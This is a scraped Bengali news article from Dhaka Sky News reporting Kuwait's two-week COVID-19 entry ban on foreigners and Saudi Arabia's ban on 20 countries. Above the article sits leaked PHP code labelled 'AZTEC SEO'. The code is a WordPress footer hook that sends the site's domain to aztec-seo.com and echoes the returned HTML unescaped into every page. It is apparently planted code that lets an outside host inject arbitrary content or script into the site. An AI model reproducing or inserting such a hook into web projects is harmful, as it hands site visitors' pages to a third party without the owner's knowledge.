/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সৌদির পর বিদেশি নাগরিকদের প্রবেশের উপর নিষেধাজ্ঞা দিলো কুয়েত | Dhaka Sky News

আমেরিকার ভেতরে আগ্নেয়াস্ত্র বিক্রিতে রেকর্ড সৃষ্টি

আগের সংবাদ

রাজধানীতে বান্ধবীর বাসায় যুবকের ‘আত্মহত্যা’

পরের সংবাদ

সৌদির পর বিদেশি নাগরিকদের প্রবেশের উপর নিষেধাজ্ঞা দিলো কুয়েত

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 4, 2021 , 10:31 pm

করোনাভাইরাসের সংক্রমণ আবারও বেড়ে যাওয়ায় আগামী ৭ ফেব্রুয়ারি থেকে দুই সপ্তাহের জন্য বিদেশি নাগরিকদের প্রবেশে নিষেধাজ্ঞা জারি করেছে কুয়েত।

কুয়েতি মন্ত্রিসভা এক বিবৃতিতে এ তথ্য জানিয়ে বলেছে, তবে কুয়েতি নাগরিকদের প্রথম-স্তরের আত্মীয়-স্বজন যেমন অভিভাবক ও সন্তান এবং তাদের গৃহকর্মীরা এই নিষেধাজ্ঞার আওতায় থাকবে না। তবে যারাই প্রবেশ করবে, তাদের কোয়ারেন্টিনে থাকতে হবে।

এ ছাড়া রাত ৮টার মধ্যে ব্যায়ামাগার, সেলুন ও ব্যবসা প্রতিষ্ঠান বন্ধ করার নির্দেশ দেওয়া হয়েছে। তবে ফার্মেসি, সুপারমার্কেট ও অন্যান্য খাবারের দোকান এর আওতায় থাকবে না। কুয়েতে গতকাল বুধবার আরো ৭৫৬ জনের করোনা শনাক্ত করা হয়েছে।

চলতি সপ্তাহেই এর আগে ২০টি দেশের নাগরিকদের প্রবেশে নিষেধাজ্ঞা জারি করেছে সৌদি আরব। এর মধ্যে সৌদি আরবের নাগরিক, কূটনীতিক ও চিকিৎসা কর্মকর্তারা এবং তাদের পরিবার এই নিষেধাজ্ঞার আওতায় থাকবে না।

নিষেধাজ্ঞার আওতায় থাকা দেশগুলোর তালিকায় রয়েছে- আর্জেন্টিনা, সংযুক্ত আরব আমিরাত, জার্মানি, মার্কিন যুক্তরাষ্ট্র, ইন্দোনেশিয়া, আয়ারল্যান্ড, ইতালি, পাকিস্তান, ব্রাজিল, পর্তুগাল, যুক্তরাজ্য, তুরস্ক, দক্ষিণ আফ্রিকা, সুইডেন, সুইজারল্যান্ড, ফ্রান্স, লেবানন, মিসর, ভারত এবং জাপান।

সৌদি আরবের স্বরাষ্ট্র মন্ত্রণালয়ের পক্ষ থেকে আজ (বৃহস্পতিবার) জানানো হয়েছে, রেস্তোরাঁয় খাওয়া-দাওয়া, বিনোদন কর্মকাণ্ড ও অনুষ্ঠান ১০ দিন বন্ধ থাকবে। সৌদি আরবে গতকাল বুধবার ৩০৬ জনের করোনা শনাক্ত করা হয়েছে। সূত্র : পার্সটুডে